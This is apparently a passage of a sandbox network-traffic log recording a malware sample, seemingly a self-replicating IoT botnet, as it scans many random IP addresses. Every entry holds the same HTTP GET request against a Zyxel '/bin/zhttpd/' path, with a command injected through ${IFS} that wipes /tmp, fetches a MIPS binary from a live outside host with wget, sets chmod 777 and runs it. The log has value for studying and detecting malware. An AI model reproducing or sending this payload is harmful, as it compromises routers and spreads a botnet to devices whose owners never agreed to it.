                                    Jan 13, 2024 19:02:19.852281094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    889192.168.2.1351612139.173.14.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852319002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    890192.168.2.1358998194.255.68.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852343082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    891192.168.2.1356490201.207.106.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852401018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    892192.168.2.134442232.190.239.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852426052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    893192.168.2.135023880.27.0.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852463961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    894192.168.2.1345136150.173.157.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852519989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    895192.168.2.1351252151.11.209.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852555990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    896192.168.2.1337506160.131.65.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852607012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    897192.168.2.1332824218.202.37.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852639914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    898192.168.2.134300438.46.28.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852647066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    899192.168.2.1333858218.28.50.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852719069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    900192.168.2.134889892.241.26.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852735043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    901192.168.2.133425854.13.186.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852799892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    902192.168.2.135168699.137.177.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852821112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    903192.168.2.1359964159.68.170.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852878094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    904192.168.2.135421449.137.103.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852911949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    905192.168.2.135855445.111.5.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852960110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    906192.168.2.1353242160.49.205.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.852994919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    907192.168.2.1348144139.93.55.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853019953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    908192.168.2.1340138187.152.156.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853076935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    909192.168.2.1354212178.99.199.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853115082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    910192.168.2.1341754113.179.8.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853156090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    911192.168.2.135119637.80.115.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853193045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    912192.168.2.135372413.105.27.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853230000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    913192.168.2.135573061.184.76.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853262901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    914192.168.2.1357538206.116.71.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853291988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    915192.168.2.1340690132.128.150.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853317022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    916192.168.2.1359012193.150.166.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853380919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    917192.168.2.134504477.213.221.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853406906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    918192.168.2.1335000109.135.251.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853449106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    919192.168.2.1352986221.250.2.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853504896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    920192.168.2.133839446.230.165.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853537083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    921192.168.2.1352806164.122.248.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853557110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    922192.168.2.1340282153.98.186.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853598118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    923192.168.2.135764441.40.109.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853651047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    924192.168.2.1343054125.225.106.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853682041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    925192.168.2.133382439.162.70.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853714943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    926192.168.2.133434841.232.15.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853743076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    927192.168.2.1351114129.75.2.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853786945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    928192.168.2.1340932115.201.18.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853827000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    929192.168.2.1339320138.48.22.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853878021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    930192.168.2.1359708205.204.153.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853910923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    931192.168.2.1354308175.211.48.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853957891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    932192.168.2.1339032221.102.197.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.853996992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    933192.168.2.136057257.173.233.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854027987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    934192.168.2.1360252217.221.202.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854069948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    935192.168.2.134665671.33.227.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854091883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    936192.168.2.134783060.10.53.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854124069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    937192.168.2.134010023.121.10.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854154110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    938192.168.2.1340066135.104.57.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854188919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    939192.168.2.133368862.84.74.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854223013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    940192.168.2.136041882.54.224.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854248047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    941192.168.2.134284024.215.53.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854300976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    942192.168.2.1333098209.253.239.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854326010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    943192.168.2.134158496.111.146.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854352951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    944192.168.2.134601287.90.110.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854383945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    945192.168.2.1353504101.167.148.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854439974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    946192.168.2.134140249.213.63.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854480028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    947192.168.2.1348728200.23.76.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854522943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    948192.168.2.135900425.19.1.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854569912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    949192.168.2.13333384.155.153.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854598999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    950192.168.2.1333014178.19.30.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.854624033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    951192.168.2.1332950162.59.98.120443
                                    TimestampBytes transferredDirectionData
